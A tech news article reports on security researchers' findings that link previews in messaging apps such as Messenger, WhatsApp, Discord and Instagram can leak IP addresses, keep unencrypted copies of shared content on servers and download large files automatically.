Almost all popular messaging apps offer link previews, which let users know the content of a URL in advance. However, security researchers Talal Haj Bakry and Tommy Mysk have discovered that these link previews can expose user data in both iOS and Android apps.
When you send any link through a messaging app like Messenger, WhatsApp, and even iMessage, the app generates a preview of that link which usually contains an image, title, and sometimes a short text. Although this is an extremely useful feature, Bakry and Mysk have raised some privacy concerns about it.
Researchers explain that there are different ways to generate these previews and that some methods are more secure than others. iMessage and WhatsApp, for example, fetch the content of a URL right when you send it to someone else. This probably means that you know what is being shared, and also that the other person will get a preview generated by you.
Let’s take a step back and think about how a preview gets generated. How does the app know what to show in the summary? It must somehow automatically open the link to know what’s inside. But is that safe? What if the link contains malware? Or what if the link leads to a very large file that you wouldn’t want the app to download and use up your data?
Reddit and other apps, however, generate the preview on the receiver’s device. Once you receive a link in these apps, they open the URL in the background and then generate a preview link. In this method, an unknown person can send you a malicious link that collects data from your device such as the IP address of your phone — and consequently its approximate location.
However, there is a third approach that may actually put your personal data in danger. As researchers have pointed out, apps like Discord, Messenger, Instagram, and Twitter generate these link previews on a remote server instead of the sender and receiver devices. For users, that means these URL messages are not end-to-end encrypted, so anyone with access to these servers can view the chat content.
They also found out that some of these apps generate and download previews automatically, even if it’s a large file. Facebook Messenger, for instance, can download a file of up to 20MB without any user interaction — which seems unnecessary to show images and text. And, of course, that also means your personal files are stored on the servers of these companies without encryption since the previews are generated online.
In one of their tests, researchers were able to obtain the IP addresses of the receivers by just sending links through these apps that automatically download the preview links. They also warn that in some cases, webpages can even run malicious Javascript code through these previews.
So that secret design document that you shared a link to from your OneDrive, and you thought you had deleted because you no longer wanted to share it? There might be a copy of it on one of these link preview servers.
The team contacted the developers of the apps mentioned in the article to check how they plan to make link previews more secure. Until then, you can check the full research in detail on Mysk’s blog.